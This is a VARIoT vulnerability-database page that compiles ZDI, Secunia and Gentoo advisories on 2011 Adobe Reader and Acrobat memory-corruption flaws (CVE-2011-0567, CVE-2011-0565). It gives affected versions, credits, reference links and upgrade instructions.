VARIoT IoT vulnerabilities database
| VAR-201102-0023 | CVE-2011-0567 | Adobe Reader and Acrobat Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
AcroRd32.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted image that triggers an incorrect pointer calculation, leading to heap memory corruption, a different vulnerability than CVE-2011-0566 and CVE-2011-0603. Adobe Reader and Acrobat Any code that could be executed or service disruption (DoS) There is a vulnerability that becomes a condition. This vulnerability CVE-2011-0566 and CVE-2011-0603 Is a different vulnerability.Arbitrary code execution or service disruption via a crafted image by a third party (DoS) There is a possibility of being put into a state. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within AcroRd32.dll. Initially, a pointer passed to memset can be miscalculated and the resulting copy operation corrupts heap memory. Later, the application attempts to use the modified data which can be leveraged to execute arbitrary code under the context of the user invoking the Reader application.
Adobe Reader and Acrobat versions prior to 9.4.2 and 10.0.1 are affected.
For more information:
SA43207
SOLUTION:
Updated packages are available via Red Hat Network.
The specific flaw exists within AcroRd32.dll.
-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:
http://www.adobe.com/support/security/bulletins/apsb11-03.html
-- Disclosure Timeline:
2010-06-30 - Vulnerability reported to vendor
2011-02-08 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Abdullah Ada
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
Adobe Reader / Acrobat Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA43207
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43207/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43207/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43207/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Reader /
Acrobat, which can be exploited by malicious, local users to gain
escalated privileges and by malicious people to conduct cross-site
scripting attacks and compromise a user's system.
2) An unspecified error can be exploited to corrupt memory.
3) An unspecified error related to file permissions in Windows-based
versions can be exploited to gain escalated privileges.
4) An unspecified error may allow code execution.
5) An unspecified error when parsing images can be exploited to
corrupt memory.
6) An error in AcroRd32.dll when parsing certain images can be
exploited to corrupt memory.
7) An unspecified error in the Macintosh-based versions may allow
code execution.
9) An unspecified error may allow code execution.
10) A input validation error may allow code execution.
11) An input validation error can be exploited to conduct cross-site
scripting attacks.
13) An unspecified error can be exploited to corrupt memory.
14) A boundary error when decoding U3D image data in an IFF file can
be exploited to cause a buffer overflow.
15) A boundary error when decoding U3D image data in a RGBA file can
be exploited to cause a buffer overflow.
16) A boundary error when decoding U3D image data in a BMP file can
be exploited to cause a buffer overflow.
17) A boundary error when decoding U3D image data in a PSD file can
be exploited to cause a buffer overflow.
18) An input validation error when parsing fonts may allow code
execution.
19) A boundary error when decoding U3D image data in a FLI file can
be exploited to cause a buffer overflow.
20) An error in 2d.dll when parsing height and width values of RLE_8
compressed BMP files can be exploited to cause a heap-based buffer
overflow.
21) An integer overflow in ACE.dll when parsing certain ICC data can
be exploited to cause a buffer overflow.
22) A boundary error in rt3d.dll when parsing bits per pixel and
number of colors if 4/8-bit RLE compressed BMP files can be exploited
to cause a heap-based buffer overflow.
23) An error in the U3D implementation when handling the Parent Node
count can be exploited to cause a buffer overflow.
24) A boundary error when processing JPEG files embedded in a PDF
file can be exploited to corrupt heap memory.
25) An unspecified error when parsing images may allow code
execution.
26) An input validation error can be exploited to conduct cross-site
scripting attacks.
27) An unspecified error in the Macintosh-based versions may allow
code execution.
28) A boundary error in rt3d.dll when parsing certain files can be
exploited to cause a stack-based buffer overflow.
29) An integer overflow in the U3D implementation when parsing a ILBM
texture file can be exploited to cause a buffer overflow.
30) Some vulnerabilities are caused due to vulnerabilities in the
bundled version of Adobe Flash Player.
For more information:
SA43267
The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1
and prior, and 10.0 and prior.
SOLUTION:
Update to version 8.2.6, 9.4.2, or 10.0.1.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
2) Bing Liu, Fortinet's FortiGuard Labs.
6) Abdullah Ada via ZDI.
8) Haifei Li, Fortinet's FortiGuard Labs.
14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI.
21) Sebastian Apelt via ZDI.
23) el via ZDI.
14) Sean Larsson, iDefense Labs.
28) An anonymous person via ZDI.
The vendor also credits:
1) Mitja Kolsek, ACROS Security.
3) Matthew Pun.
4, 5, 18) Tavis Ormandy, Google Security Team.
7) James Quirk.
9) Brett Gervasoni, Sense of Security.
10) Joe Schatz.
11, 26) Billy Rios, Google Security Team.
12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar.
13) CESG.
25) Will Dormann, CERT.
27) Marc Schoenefeld, Red Hat Security Response Team.
ORIGINAL ADVISORY:
Adobe (APSB11-03)
http://www.adobe.com/support/security/bulletins/apsb11-03.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-065/
http://www.zerodayinitiative.com/advisories/ZDI-11-066/
http://www.zerodayinitiative.com/advisories/ZDI-11-067/
http://www.zerodayinitiative.com/advisories/ZDI-11-068/
http://www.zerodayinitiative.com/advisories/ZDI-11-069/
http://www.zerodayinitiative.com/advisories/ZDI-11-070/
http://www.zerodayinitiative.com/advisories/ZDI-11-071/
http://www.zerodayinitiative.com/advisories/ZDI-11-072/
http://www.zerodayinitiative.com/advisories/ZDI-11-073/
http://www.zerodayinitiative.com/advisories/ZDI-11-074/
http://www.zerodayinitiative.com/advisories/ZDI-11-075/
http://www.zerodayinitiative.com/advisories/ZDI-11-077/
FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-06.html
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Please
review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Reader users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"
References
==========
[ 1 ] CVE-2010-4091
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201102-0021 | CVE-2011-0565 | Adobe Reader and Acrobat Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0585. This vulnerability CVE-2011-0585 Is a different vulnerability.An attacker could execute arbitrary code. Adobe Acrobat and Reader are prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to cause the affected application to crash.
Adobe Reader and Acrobat versions prior to 9.4.2 and 10.0.1 are affected.
For more information:
SA43207
SOLUTION:
Updated packages are available via Red Hat Network. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
Adobe Reader / Acrobat Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA43207
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43207/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43207/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43207/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Reader /
Acrobat, which can be exploited by malicious, local users to gain
escalated privileges and by malicious people to conduct cross-site
scripting attacks and compromise a user's system.
2) An unspecified error can be exploited to corrupt memory.
3) An unspecified error related to file permissions in Windows-based
versions can be exploited to gain escalated privileges.
5) An unspecified error when parsing images can be exploited to
corrupt memory.
6) An error in AcroRd32.dll when parsing certain images can be
exploited to corrupt memory.
11) An input validation error can be exploited to conduct cross-site
scripting attacks.
13) An unspecified error can be exploited to corrupt memory.
14) A boundary error when decoding U3D image data in an IFF file can
be exploited to cause a buffer overflow.
15) A boundary error when decoding U3D image data in a RGBA file can
be exploited to cause a buffer overflow.
16) A boundary error when decoding U3D image data in a BMP file can
be exploited to cause a buffer overflow.
17) A boundary error when decoding U3D image data in a PSD file can
be exploited to cause a buffer overflow.
18) An input validation error when parsing fonts may allow code
execution.
19) A boundary error when decoding U3D image data in a FLI file can
be exploited to cause a buffer overflow.
20) An error in 2d.dll when parsing height and width values of RLE_8
compressed BMP files can be exploited to cause a heap-based buffer
overflow.
21) An integer overflow in ACE.dll when parsing certain ICC data can
be exploited to cause a buffer overflow.
22) A boundary error in rt3d.dll when parsing bits per pixel and
number of colors if 4/8-bit RLE compressed BMP files can be exploited
to cause a heap-based buffer overflow.
23) An error in the U3D implementation when handling the Parent Node
count can be exploited to cause a buffer overflow.
24) A boundary error when processing JPEG files embedded in a PDF
file can be exploited to corrupt heap memory.
26) An input validation error can be exploited to conduct cross-site
scripting attacks.
28) A boundary error in rt3d.dll when parsing certain files can be
exploited to cause a stack-based buffer overflow.
29) An integer overflow in the U3D implementation when parsing a ILBM
texture file can be exploited to cause a buffer overflow.
30) Some vulnerabilities are caused due to vulnerabilities in the
bundled version of Adobe Flash Player.
For more information:
SA43267
The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1
and prior, and 10.0 and prior.
SOLUTION:
Update to version 8.2.6, 9.4.2, or 10.0.1.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
2) Bing Liu, Fortinet's FortiGuard Labs.
6) Abdullah Ada via ZDI.
8) Haifei Li, Fortinet's FortiGuard Labs.
14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI.
21) Sebastian Apelt via ZDI.
23) el via ZDI.
14) Sean Larsson, iDefense Labs.
28) An anonymous person via ZDI.
The vendor also credits:
1) Mitja Kolsek, ACROS Security.
3) Matthew Pun.
4, 5, 18) Tavis Ormandy, Google Security Team.
7) James Quirk.
9) Brett Gervasoni, Sense of Security.
10) Joe Schatz.
11, 26) Billy Rios, Google Security Team.
12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar.
13) CESG.
25) Will Dormann, CERT.
27) Marc Schoenefeld, Red Hat Security Response Team.
ORIGINAL ADVISORY:
Adobe (APSB11-03)
http://www.adobe.com/support/security/bulletins/apsb11-03.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-065/
http://www.zerodayinitiative.com/advisories/ZDI-11-066/
http://www.zerodayinitiative.com/advisories/ZDI-11-067/
http://www.zerodayinitiative.com/advisories/ZDI-11-068/
http://www.zerodayinitiative.com/advisories/ZDI-11-069/
http://www.zerodayinitiative.com/advisories/ZDI-11-070/
http://www.zerodayinitiative.com/advisories/ZDI-11-071/
http://www.zerodayinitiative.com/advisories/ZDI-11-072/
http://www.zerodayinitiative.com/advisories/ZDI-11-073/
http://www.zerodayinitiative.com/advisories/ZDI-11-074/
http://www.zerodayinitiative.com/advisories/ZDI-11-075/
http://www.zerodayinitiative.com/advisories/ZDI-11-077/
FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-06.html
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Adobe Reader: Multiple vulnerabilities
Date: January 30, 2012
Bugs: #354211, #382969, #393481
ID: 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities in Adobe Reader might allow remote attackers
to execute arbitrary code or conduct various other attacks.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/acroread < 9.4.7 >= 9.4.7=20
Description
===========
Multiple vulnerabilities have been discovered in Adobe Reader. Please
review the CVE identifiers referenced below for details.
Impact
======
A remote attacker could entice a user to open a specially crafted PDF
file using Adobe Reader, possibly resulting in the remote execution of
arbitrary code, a Denial of Service, or other impact.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Reader users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"
References
==========
[ 1 ] CVE-2010-4091
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201102-0061 | CVE-2011-0602 | Adobe Reader and Acrobat Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
